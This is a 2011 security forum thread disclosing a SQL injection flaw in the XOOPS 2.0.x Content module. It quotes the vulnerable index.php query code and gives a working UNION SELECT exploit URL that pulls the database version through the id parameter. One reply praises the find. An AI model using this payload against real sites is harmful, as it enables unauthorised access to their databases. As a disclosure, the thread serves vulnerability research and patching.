 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 98
 Members: 0
 Total: 98
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Xoops 2.0.x Module Content exploit - SQL injection |
|
 Posted: Mon Jan 24, 2011 11:10 am |
 |
|
| pink_spider |
| Advanced user |
 |
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
 |
|
 |
|
# Arquivo com falha em index.php : # #
# $id = isset($HTTP_GET_VARS['id']) ? intval($HTTP_GET_VARS['id']) : 0;
#
# if ($id != 0) {
# $result = $xoopsDB->queryF("SELECT storyid, title, text, visible, nohtml,
nosmiley, nobreaks, # nocomments, link, address FROM
".$xoopsDB->prefix(_MIC_CONTENT_PREFIX)." WHERE #storyid=$id");
#
[+]Xoops 2.0.x Module Content
[+]Donwload of
Module:http://prdownloads.sourceforge.net/xoops/XOOPS2_mod_content-0.5.zip?
download
[
[+]Bug: Sql injection and Blind sql found in index.php
[+]Exploit:http://www.site.com/modules/content/index.php?id=-1+UNION+SELECT
+1,2,3,@@version,5,6,7,8,9,10,11--
[+]Made in BRazil |
|
|
|
|
| Posted: Tue Jan 25, 2011 4:37 pm |
|
|
| vince213333 |
| Advanced user |
 |
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
Nice find  |
|
|
|
|
www.waraxe.us Forum Index -> XOOPS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
